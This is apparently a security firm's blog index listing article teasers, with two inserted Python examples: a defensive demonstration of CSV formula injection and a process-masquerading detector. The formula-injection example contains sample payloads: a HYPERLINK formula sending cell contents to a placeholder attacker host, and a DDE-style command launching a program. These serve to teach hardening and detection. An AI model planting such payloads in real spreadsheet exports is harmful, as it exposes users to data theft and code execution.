Channel: Context Information Security Blog
Browsing all 262 articles

Careto Malware Masks Ancient but Deadly Virus DNA

Kaspersky recently discovered a new family of malware, dubbed ‘The Mask’ or ‘Careto’, which it described as one of the "most advanced global cyber-espionage operations to date”[1]. This description is...

Bypassing Windows 8.1 Mitigations using Unsafe COM Objects

In October last year I was awarded the first $100,000 bounty for a Mitigation Bypass in Microsoft Windows. My original plan was to not discuss it in any depth until Microsoft had come up with a...

Hacking into Internet Connected Light Bulbs

The subject of this blog, the LIFX light bulb, bills itself as the light bulb reinvented; a “WiFi enabled multi-color [sic], energy efficient LED light bulb” that can be controlled from a smartphone...

A Cruel Interest: Attacker motivations for targeting the financial services...

A question we often get asked is “why would APTs target my organisation, what could a state sponsored attacker possibly want with us?” While the core areas of government and the defence establishment...

Comma Separated Vulnerabilities

This post introduces Formula Injection, a technique for exploiting ‘Export to Spreadsheet’ functionality in web applications to attack users and steal spreadsheet contents. It also details a command...
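
As an added illustration of the technique this summary describes (example code written for this listing, not code from the Context post): a naive "Export to Spreadsheet" handler beside a hardened one, plus a scanner that flags cells a spreadsheet application would evaluate as formulas. The user records and the host name attacker.invalid are constructed for the example.

```python
"""
Formula (CSV) injection: an 'Export to Spreadsheet' feature writes
user-supplied values into a CSV, and a spreadsheet application then
evaluates any cell that begins with a formula trigger character.
Added example; the rows below are constructed, not real data.
"""
import csv
import io

# Leading characters that common spreadsheet applications interpret as the
# start of a formula (= + - @), plus tab and carriage return, which can
# break out of the cell and start a formula in the next one.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

# Constructed sample rows. The second and third "name" values are
# attacker-controlled: one builds a hyperlink that sends the contents of
# cells A2:A4 to an attacker host (attacker.invalid is a placeholder) when
# clicked; the other is a classic DDE-style payload that launches a program.
USERS = [
    {"id": 1, "name": "Alice Example", "email": "alice@example.test"},
    {"id": 2,
     "name": '=HYPERLINK("http://attacker.invalid/?d="&A2&A3&A4,"Click to confirm")',
     "email": "bob@example.test"},
    {"id": 3, "name": "-1+cmd|' /C calc'!A0", "email": "carol@example.test"},
]

FIELDS = ["id", "name", "email"]


def export_vulnerable(rows):
    """Naive export: every value is written exactly as stored."""
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=FIELDS)
    writer.writeheader()
    writer.writerows(rows)
    return buf.getvalue()


def neutralise_cell(value):
    """Return a value no spreadsheet will evaluate as a formula.

    A leading single quote makes the application treat the cell as literal
    text (the quote itself is not displayed). Non-string values such as
    integer IDs are left alone so numeric columns still import as numbers.
    """
    if isinstance(value, str) and value.startswith(FORMULA_TRIGGERS):
        return "'" + value
    return value


def export_hardened(rows):
    """Export with every free-text cell neutralised and every field quoted,
    so an embedded comma, quote or newline cannot change the row structure."""
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=FIELDS, quoting=csv.QUOTE_ALL)
    writer.writeheader()
    for row in rows:
        writer.writerow({k: neutralise_cell(v) for k, v in row.items()})
    return buf.getvalue()


def find_formula_cells(csv_text):
    """Scan CSV text (e.g. a file produced by an export feature under test)
    and return (row, column, value) for each cell that starts with a
    formula trigger. Useful both for reviewing an export and for checking
    untrusted spreadsheets before opening them."""
    hits = []
    for r, row in enumerate(csv.reader(io.StringIO(csv_text))):
        for c, cell in enumerate(row):
            if cell.startswith(FORMULA_TRIGGERS):
                hits.append((r, c, cell))
    return hits


if __name__ == "__main__":
    print(export_vulnerable(USERS))
    print("dangerous cells:", find_formula_cells(export_vulnerable(USERS)))
    print(export_hardened(USERS))
    print("dangerous cells:", find_formula_cells(export_hardened(USERS)))
```

The single-quote prefix is the usual mitigation for free-text columns; it is deliberately not applied to numeric types, because a legitimately negative number such as -42 would otherwise be turned into text. Whether the quote is stripped on display depends on the application, so an export that must round-trip exactly should document the prefix or use a format that carries cell types, such as XLSX.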

Upcoming service announcement: IRIS, a new aperture on Incident Response

Rapid incident response is a core function of Context's Response division and we pride ourselves on the close relationships and integration we build with our clients. However, we have found an...

Hacking Canon Pixma Printers - Doomed Encryption

This blog post is another in the series demonstrating current insecurities in devices categorised as the ‘Internet of Things’. This instalment will reveal how the firmware on Canon Pixma printers...

RDP Replay

Here at Context we work hard to keep our clients safe. During routine client monitoring our analysts noticed some suspicious RDP traffic. It was suspicious for two reasons. Firstly the client was not...

Evasive Measures: "faxmessage.php" malware delivery

In the ongoing malware arms race attackers are always trying to find creative ways to bypass detection, and this isn’t something that is limited to targeted threat actors. In fact some ingenious...

Automating Removal of Java Obfuscation

In this post we detail a method to improve analysis of Java code for a particular obfuscator, we document the process that was followed and demonstrate the results of automating our method. Obscurity...

Thanks for the Memories: Identifying Malware from a Memory Capture

We've all seen attackers try and disguise their running malware as something legitimate. They might use a file name of a legitimate Windows file or even inject code into a legitimate process that's...
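
As an added illustration of the masquerading this summary describes (example code written for this listing, not the method from the Context post): a triage pass over a process listing of the kind a memory-analysis tool produces, flagging well-known Windows process names that run from an unexpected image path or under an unexpected parent. The listing and the expected-path/parent baseline are constructed for the example and cover only a handful of core processes.

```python
"""
Process-masquerading triage over a memory-capture process listing.
Added example; PROCESSES below is constructed in the shape of a
pslist/pstree-style table and is not taken from a real capture.
"""

# Baseline of where a few core Windows processes run from and which
# process is expected to have spawned them. Assumed for illustration;
# a real baseline is built per Windows version and role.
EXPECTED = {
    "smss.exe":     {"path": r"c:\windows\system32\smss.exe",     "parents": {"system"}},
    "csrss.exe":    {"path": r"c:\windows\system32\csrss.exe",    "parents": {"smss.exe"}},
    "wininit.exe":  {"path": r"c:\windows\system32\wininit.exe",  "parents": {"smss.exe"}},
    "services.exe": {"path": r"c:\windows\system32\services.exe", "parents": {"wininit.exe"}},
    "lsass.exe":    {"path": r"c:\windows\system32\lsass.exe",    "parents": {"wininit.exe"}},
    "svchost.exe":  {"path": r"c:\windows\system32\svchost.exe",  "parents": {"services.exe"}},
}

# Constructed listing: pid, ppid, name, image path. Two entries are
# planted: a 'svchost.exe' running from a user temp directory under
# explorer.exe, and a second 'lsass.exe' spawned by services.exe.
PROCESSES = [
    {"pid": 4,    "ppid": 0,    "name": "System",       "path": ""},
    {"pid": 368,  "ppid": 4,    "name": "smss.exe",     "path": r"C:\Windows\System32\smss.exe"},
    {"pid": 464,  "ppid": 368,  "name": "csrss.exe",    "path": r"C:\Windows\System32\csrss.exe"},
    {"pid": 520,  "ppid": 368,  "name": "wininit.exe",  "path": r"C:\Windows\System32\wininit.exe"},
    {"pid": 612,  "ppid": 520,  "name": "services.exe", "path": r"C:\Windows\System32\services.exe"},
    {"pid": 620,  "ppid": 520,  "name": "lsass.exe",    "path": r"C:\Windows\System32\lsass.exe"},
    {"pid": 756,  "ppid": 612,  "name": "svchost.exe",  "path": r"C:\Windows\System32\svchost.exe"},
    {"pid": 1804, "ppid": 1632, "name": "explorer.exe", "path": r"C:\Windows\explorer.exe"},
    {"pid": 2312, "ppid": 1804, "name": "svchost.exe",  "path": r"C:\Users\alice\AppData\Local\Temp\svchost.exe"},
    {"pid": 3020, "ppid": 612,  "name": "lsass.exe",    "path": r"C:\Windows\System32\lsass.exe"},
]


def triage(processes):
    """Return (pid, name, reason) for each baseline process whose image path
    or parent does not match what is expected. Name comparison is
    case-insensitive because attackers routinely vary the case."""
    by_pid = {p["pid"]: p for p in processes}
    findings = []
    for p in processes:
        name = p["name"].lower()
        baseline = EXPECTED.get(name)
        if baseline is None:
            continue  # not in the baseline; nothing to compare against
        if p["path"].lower() != baseline["path"]:
            findings.append((p["pid"], name, "unexpected image path %s" % p["path"]))
        parent = by_pid.get(p["ppid"])
        # A parent missing from the listing has usually exited (normal for
        # smss.exe children); report it rather than silently passing it.
        parent_name = parent["name"].lower() if parent else "<not in listing>"
        if parent_name not in baseline["parents"]:
            findings.append((p["pid"], name,
                             "unexpected parent %s (pid %d)" % (parent_name, p["ppid"])))
    return findings


def suspicious_pids(processes):
    """Convenience wrapper: the set of PIDs with at least one finding."""
    return {pid for pid, _, _ in triage(processes)}


if __name__ == "__main__":
    for pid, name, reason in triage(PROCESSES):
        print("pid %-5d %-13s %s" % (pid, name, reason))
```

Name, path and parent checks catch the cheap disguises; the injected-code case the summary also mentions needs memory-level checks (unbacked executable regions, hollowed images) that a listing alone cannot show.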

RFID Tags in Access Control Systems

One of our recent engagements required us to explore an unknown RFID tag which was used as part of an access control system. The objective of this engagement was to find out how the RFID tag...

SQL Inception: How to select yourself

In this blog post I will describe a few ways to view the whole SQL statement being executed as part of a SQL injection attack. Currently, unless the vulnerable page returns the SQL statement in an...

Breaking the law: the legal sector remains an attractive target; why not turn...

The legal sector will remain an attractive target for the full spectrum of threat actors: cyber-criminals, hacktivists and state-sponsored groups. Unsurprisingly, this is due to the wealth of sensitive...

Wireless Gridlock in the IoT

“What good is a phone call when you are unable to speak?”

Introduction

When people mention the Internet of Things (IoT) and congestion they’re likely referring to novel solutions to urban traffic...

The Emergence of Bluetooth Low Energy

Introduction

This blog is about Bluetooth Low Energy (BLE), which is the relatively new, lower-power version of the Bluetooth protocol. BLE was introduced in version 4.0 of the Bluetooth Core...

Manually Testing SSL/TLS Weaknesses

The Secure Sockets Layer (SSL) and Transport Layer Security (TLS) protocols aim to provide client and server systems with a means of establishing an encrypted communication channel. Though best known...

The recent US government data breach: big data techniques, a driving force...

The recent cyber-attack against the Office of Personnel Management (OPM) has resulted in the compromise of data relating to millions of current and former United States (US) government employees. In a...

Vulnerability Statistics & Trends in 2015

I have conducted research using Context’s penetration testing management database across 3,475 web application and infrastructure penetration tests for the years 2013, 2014 & 2015. The research...

DNSWatch - When a full DNS tunnel is just too much

During certain engagements it is a requirement to extract data from a network - or at least prove that it would be possible in different ways. One common and very well-known way to do this is to...
